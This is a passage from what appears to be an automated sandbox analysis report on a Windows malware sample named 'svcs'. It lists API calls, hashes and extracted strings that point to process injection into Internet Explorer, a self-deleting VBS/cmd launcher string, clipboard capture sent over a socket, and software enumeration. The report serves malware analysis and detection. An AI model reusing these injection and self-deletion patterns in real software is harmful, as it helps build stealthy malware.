                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$hdF$hdF$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-3633479162
                                • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-3229884001
                                • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                • DisplayName, xrefs: 0041C73C
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
